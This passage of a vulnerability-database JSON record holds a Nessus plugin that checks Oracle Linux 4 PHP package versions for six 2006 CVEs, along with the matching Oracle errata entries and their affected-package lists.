a remote attacker could cause a heap overflow.\n(CVE-2006-4484)\n\nAn integer overflow was discovered in the PHP memory allocation\nhandling. On 64-bit platforms, the 'memory_limit' setting was not\nenforced correctly, which could allow a denial of service attack by a\nremote user. (CVE-2006-4486)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2006-November/000016.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-devel-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-devel-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-domxml-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-domxml-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-gd-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-gd-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-imap-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-imap-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-ldap-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-ldap-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-mbstring-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-mbstring-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-mysql-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-mysql-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-ncurses-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-ncurses-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-odbc-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-odbc-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-pear-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-pear-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-pgsql-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-pgsql-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-snmp-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-snmp-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-xmlrpc-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-xmlrpc-4.3.9-3.22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n\n", "title": "Oracle Linux 4 : php (ELSA-2006-0730 / ELSA-2006-0669)", "type": "nessus", "viewCount": 0}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:25:52"}], "edition": 5, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "a3df1211c7b4f8002f729fdec6b65ba4"}, {"key": "cvelist", "hash": "afe48c3fc64f3dcf0944ff6536c43c36"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "description", "hash": "b2bcd21dea5c25f09b234688651791fd"}, {"key": "href", "hash": "c5b9315a071dc031333e754a6c18b197"}, {"key": "modified", "hash": "1865261413c3db59730e6f4c15d45b87"}, {"key": "naslFamily", "hash": "e31ed89ab0cbb68ce2c40f17ec1e5483"}, {"key": "pluginID", "hash": "ca3712ddee1ac1e48e7d8a157ac26179"}, {"key": "published", "hash": "0db193a0effe2d65dffecdb5e4d9c241"}, {"key": "references", "hash": "c52c842077cf089d22f0664713131fe8"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "5e129de1471424c1b785db5398b6e034"}, {"key": "title", "hash": "296976f54ebc7ab6844139efdf1ee500"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "62ba70ccc6f7d9996206036562c2c55f6150be77cbf377a1e93711e3e4c8552f", "viewCount": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisories ELSA-2006-0730 / \n# ELSA-2006-0669.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67421);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/08/13 14:32:36\");\n\n script_cve_id(\"CVE-2006-3016\", \"CVE-2006-4020\", \"CVE-2006-4482\", \"CVE-2006-4484\", \"CVE-2006-4486\", \"CVE-2006-5465\");\n script_xref(name:\"RHSA\", value:\"2006:0669\");\n script_xref(name:\"RHSA\", value:\"2006:0730\");\n\n script_name(english:\"Oracle Linux 4 : php (ELSA-2006-0730 / ELSA-2006-0669)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix a security issue are now available. \n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team. \n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server. \n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues. These packages also contain\na fix for a bug where certain input strings to the metaphone() function\ncould cause memory corruption. \n\n\nFrom Red Hat Security Advisory 2006:0730 :\n\nThe Hardened-PHP Project discovered an overflow in the PHP\nhtmlentities() and htmlspecialchars() routines. If a PHP script used\nthe vulnerable functions to parse UTF-8 data, a remote attacker\nsending a carefully crafted request could trigger the overflow and\npotentially execute arbitrary code as the 'apache' user.\n(CVE-2006-5465)\n\n\nFrom Red Hat Security Advisory 2006:0669 :\n\nA response-splitting issue was discovered in the PHP session handling.\nIf a remote attacker can force a carefully crafted session identifier\nto be used, a cross-site-scripting or response-splitting attack could\nbe possible. (CVE-2006-3016)\n\nA buffer overflow was discovered in the PHP sscanf() function. If a\nscript used the sscanf() function with positional arguments in the\nformat string, a remote attacker sending a carefully crafted request\ncould execute arbitrary code as the 'apache' user. (CVE-2006-4020)\n\nAn integer overflow was discovered in the PHP wordwrap() and\nstr_repeat() functions. If a script running on a 64-bit server used\neither of these functions on untrusted user data, a remote attacker\nsending a carefully crafted request might be able to cause a heap\noverflow. (CVE-2006-4482)\n\nA buffer overflow was discovered in the PHP gd extension. If a script\nwas set up to process GIF images from untrusted sources using the gd\nextension, a remote attacker could cause a heap overflow.\n(CVE-2006-4484)\n\nAn integer overflow was discovered in the PHP memory allocation\nhandling. On 64-bit platforms, the 'memory_limit' setting was not\nenforced correctly, which could allow a denial of service attack by a\nremote user. (CVE-2006-4486)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2006-November/000016.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-devel-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-devel-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-domxml-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-domxml-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-gd-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-gd-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-imap-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-imap-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-ldap-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-ldap-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-mbstring-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-mbstring-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-mysql-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-mysql-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-ncurses-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-ncurses-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-odbc-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-odbc-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-pear-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-pear-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-pgsql-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-pgsql-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-snmp-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-snmp-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-xmlrpc-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-xmlrpc-4.3.9-3.22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n\n", "naslFamily": "Oracle Linux Local Security Checks", "pluginID": "67421", "cpe": ["p-cpe:/a:oracle:linux:php-ldap", "p-cpe:/a:oracle:linux:php-domxml", "p-cpe:/a:oracle:linux:php-devel", "p-cpe:/a:oracle:linux:php-imap", "p-cpe:/a:oracle:linux:php-mbstring", "p-cpe:/a:oracle:linux:php-ncurses", "p-cpe:/a:oracle:linux:php-snmp", "p-cpe:/a:oracle:linux:php", "p-cpe:/a:oracle:linux:php-gd", "p-cpe:/a:oracle:linux:php-mysql", "p-cpe:/a:oracle:linux:php-xmlrpc", "p-cpe:/a:oracle:linux:php-pear", "cpe:/o:oracle:linux:4", "p-cpe:/a:oracle:linux:php-odbc", "p-cpe:/a:oracle:linux:php-pgsql"]}
{"oraclelinux": [{"lastseen": "2018-08-31T01:49:24", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageFilename": "php-gd-4.3.9-3.22.i386.rpm", "packageName": "php-gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageFilename": "php-odbc-4.3.9-3.22.i386.rpm", "packageName": "php-odbc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageFilename": "php-mbstring-4.3.9-3.22.i386.rpm", "packageName": "php-mbstring", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageFilename": "php-odbc-4.3.9-3.22.x86_64.rpm", "packageName": "php-odbc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageFilename": "php-4.3.9-3.22.x86_64.rpm", "packageName": "php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageFilename": "php-mysql-4.3.9-3.22.x86_64.rpm", "packageName": "php-mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageFilename": "php-gd-4.3.9-3.22.x86_64.rpm", "packageName": "php-gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageFilename": "php-snmp-4.3.9-3.22.x86_64.rpm", "packageName": "php-snmp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageFilename": "php-ncurses-4.3.9-3.22.i386.rpm", "packageName": "php-ncurses", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageFilename": "php-mbstring-4.3.9-3.22.x86_64.rpm", "packageName": "php-mbstring", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageFilename": "php-domxml-4.3.9-3.22.i386.rpm", "packageName": "php-domxml", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageFilename": "php-devel-4.3.9-3.22.i386.rpm", "packageName": "php-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageFilename": "php-pgsql-4.3.9-3.22.x86_64.rpm", "packageName": "php-pgsql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageFilename": "php-snmp-4.3.9-3.22.i386.rpm", "packageName": "php-snmp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageFilename": "php-imap-4.3.9-3.22.x86_64.rpm", "packageName": "php-imap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageFilename": "php-domxml-4.3.9-3.22.x86_64.rpm", "packageName": "php-domxml", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageFilename": "php-xmlrpc-4.3.9-3.22.i386.rpm", "packageName": "php-xmlrpc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageFilename": "php-4.3.9-3.22.i386.rpm", "packageName": "php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageFilename": "php-imap-4.3.9-3.22.i386.rpm", "packageName": "php-imap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageFilename": "php-pgsql-4.3.9-3.22.i386.rpm", "packageName": "php-pgsql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageFilename": "php-ldap-4.3.9-3.22.i386.rpm", "packageName": "php-ldap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageFilename": "php-ldap-4.3.9-3.22.x86_64.rpm", "packageName": "php-ldap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageFilename": "php-pear-4.3.9-3.22.i386.rpm", "packageName": "php-pear", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "src", "packageFilename": "php-4.3.9-3.22.src.rpm", "packageName": "php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "src", "packageFilename": "php-4.3.9-3.22.src.rpm", "packageName": "php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageFilename": "php-pear-4.3.9-3.22.x86_64.rpm", "packageName": "php-pear", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageFilename": "php-mysql-4.3.9-3.22.i386.rpm", "packageName": "php-mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageFilename": "php-xmlrpc-4.3.9-3.22.x86_64.rpm", "packageName": "php-xmlrpc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageFilename": "php-devel-4.3.9-3.22.x86_64.rpm", "packageName": "php-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageFilename": "php-ncurses-4.3.9-3.22.x86_64.rpm", "packageName": "php-ncurses", "operator": "lt"}], "description": " [4.3.9-3.22]\n - avoid default pear.conf change\n \n [4.3.9-3.21]\n - add security fix for CVE-2006-5465 from upstream\n \n [4.3.9-3.20]\n - add fix for php_error varargs use (#199947)\n \n [4.3.9-3.18]\n - rebuild\n \n [4.3.9-3.17]\n - add security fix from upstream: CVE-2006-4484\n - add metaphone() fix (#205714)\n \n [4.3.9-3.16]\n - add security fixes from upstream:\n CVE-2006-3016, CVE-2006-4020, CVE-2006-4482, CVE-2006-4486 ", "edition": 3, "reporter": "Oracle", "published": "2006-11-30T00:00:00", "title": "Important php security update ", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-4486", "CVE-2006-4484", "CVE-2006-4020", "CVE-2006-3016", "CVE-2006-4482", "CVE-2006-5465"], "modified": "2006-11-30T00:00:00", "id": "ELSA-2006-0730", "href": "http://linux.oracle.com/errata/ELSA-2006-0730.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:45:54", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageFilename": "php-gd-4.3.9-3.22.i386.rpm", "packageName": "php-gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageFilename": "php-odbc-4.3.9-3.22.i386.rpm", "packageName": "php-odbc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageFilename": "php-mbstring-4.3.9-3.22.i386.rpm", "packageName": "php-mbstring", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageFilename": "php-odbc-4.3.9-3.22.x86_64.rpm", "packageName": "php-odbc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageFilename": "php-4.3.9-3.22.x86_64.rpm", "packageName": "php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageFilename": "php-mysql-4.3.9-3.22.x86_64.rpm", "packageName": "php-mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageFilename": "php-gd-4.3.9-3.22.x86_64.rpm", "packageName": "php-gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageFilename": "php-snmp-4.3.9-3.22.x86_64.rpm", "packageName": "php-snmp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageFilename": "php-ncurses-4.3.9-3.22.i386.rpm", "packageName": "php-ncurses", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageFilename": "php-mbstring-4.3.9-3.22.x86_64.rpm", "packageName": "php-mbstring", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageFilename": "php-domxml-4.3.9-3.22.i386.rpm", "packageName": "php-domxml", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageFilename": "php-devel-4.3.9-3.22.i386.rpm", "packageName": "php-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageFilename": "php-pgsql-4.3.9-3.22.x86_64.rpm", "packageName": "php-pgsql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageFilename": "php-snmp-4.3.9-3.22.i386.rpm", "packageName": "php-snmp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageFilename": "php-imap-4.3.9-3.22.x86_64.rpm", "packageName": "php-imap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageFilename": "php-domxml-4.3.9-3.22.x86_64.rpm", "packageName": "php-domxml", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageFilename": "php-xmlrpc-4.3.9-3.22.i386.rpm", "packageName": "php-xmlrpc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageFilename": "php-4.3.9-3.22.i386.rpm", "packageName": "php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageFilename": "php-imap-4.3.9-3.22.i386.rpm", "packageName": "php-imap", "operator": 